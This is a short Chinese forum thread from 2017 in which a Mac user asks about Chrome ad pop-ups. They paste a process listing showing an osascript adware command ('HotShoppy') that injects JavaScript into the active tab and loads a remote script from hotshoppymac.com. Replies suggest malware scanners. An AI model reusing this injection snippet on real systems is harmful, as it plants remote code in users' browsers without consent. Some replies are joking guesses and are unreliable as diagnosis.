这是一个创建于 2557 天前的主题,其中的信息可能已经有所发展或是发生改变。
501 58518 965 0 10:41 下午 ?? 0:00.01 osascript -e if application "Google Chrome" is running then -e log "Active" -e run script"tell application "Google Chrome"\n execute front window's active tab javascript "_webhelper_source = {GUID:'56433956730706156', SOURCE:'pic-1623', BRAND:'HotShoppy'};if ( ! document.getElementById('_webhelper_source') ) { var hiddenInput = document.createElement('input');hiddenInput.id = '_webhelper_source'; hiddenInput.type = 'hidden';hiddenInput.value = JSON.stringify(_webhelper_source);document.getElementsByTagName('body')[0].appendChild(hiddenInput);} if ( ! document.getElementById('webHelper') ) {var newScript = document.createElement('script');newScript.id = 'webHelper'; newScript.type = 'text/javascript';newScript.src = '//secure.hotshoppymac.com/servicejs/components/?source=pic-1623&version=2.0&isn=800'; var efs = document.getElementsByTagName('script')[0];if (efs) {efs.parentNode.insertBefore(newScript, efs);} else {document.getElementsByTagName('head')[0].appendChild(newScript);}}"\nend tell\n" -e end if
第 1 条附言 · 2017-11-23 09:29:31 +08:00
sorry,问题没描述清楚,昨天开始发现每次打开Chrome的时候都弹出广告页,找了半天实在是没找到凶手,查看了一下进程发现有上面贴的那一堆东西,刚开始也是没看懂所以就直接贴过来了,后面查了一下好像有个什么叫osascript的东西,然后进程里面有一个BRAND:'HotShoppy',然后就直接在系统里面干掉了相关的文件
 |
1
eminemcola 2017-11-22 23:56:37 +08:00 via iPhone
一个不懂得如何提问的典型例子
|
 |
2
zhangxs8964 2017-11-23 00:22:47 +08:00 via Android
是,中医可治疗
|
 |
3
minamike 2017-11-23 07:39:38 +08:00 via iPhone
我感觉是你中毒了
|
 |
4
huangunic0rn 2017-11-23 08:35:07 +08:00 via Android
蛋疼。
楼主安装个 ESET for Mac 吧 |
 |
5
KNOX 2017-11-23 09:12:41 +08:00 via Android
其实…发生了什么?
|
 |
6
UnknownR 2017-11-23 09:44:16 +08:00
你是不是装了 mackeeper
|
 |
7
lp10 2017-11-23 10:52:14 +08:00
看着像,下个 Malwarebytes 查一遍毒吧。
|
 |
8
li746224 2017-11-23 11:45:54 +08:00
貌似我电脑上也有,很烦,只有 chrome 中招,其他浏览器就没有问题
|
 |
9
lrigi 2017-11-23 17:44:22 +08:00 via iPhone
@li746224 if application "Google Chrome" is running then -e log "Active" -e run script"tell application "Google Chrome"\n execute front window's active tab javascript "_webhelper_source = {GUID:'56433956730706156', SOURCE:'pic-1623', BRAND:'HotShoppy'};i
这里的代码看起来像是一个脚本之类的东西... 如果应用 chrome 运行, 让 Chrome 再开个活动窗口 balabala 感觉不是很大的问题……因为代码看起来很蠢...不像是高大上的病毒代码... 拿小红伞查查毒? |
Select Language